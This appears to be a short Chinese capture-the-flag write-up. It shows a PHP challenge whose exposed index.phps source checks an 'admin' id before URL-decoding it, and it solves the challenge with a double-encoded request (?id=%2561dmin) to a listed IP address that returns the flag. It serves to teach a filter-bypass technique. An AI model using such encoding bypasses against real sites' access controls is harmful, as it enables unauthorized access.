0x01
御剑扫描后台没有发现,查看页面代码没有发现。最后发现是index.phps
.phps文件是php的源代码文件,用于提供给用户(访问者)查看php代码,用户无法通过web浏览器看到php文件的内容,所以用phps文件代替。
/index.phps得到源码
<?php
if("admin"===$_GET[id]) {
echo("not allowed!");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin") {
echo "Access granted!";
echo "Key: xxxxxxx";
}
?>
Can you anthenticate to this website?
0x02代码分析
admin不能等于GET传入的值
GET传入的值进行编码
编码后的值与admin相等
那么使用urldecode
http://124.126.19.106:37752/?id=%2561dmin
//%2561 解码为%61
//%61 解码为a
得到flag
参考链接:
https://blog.csdn.net/wyj_1216/article/details/95235159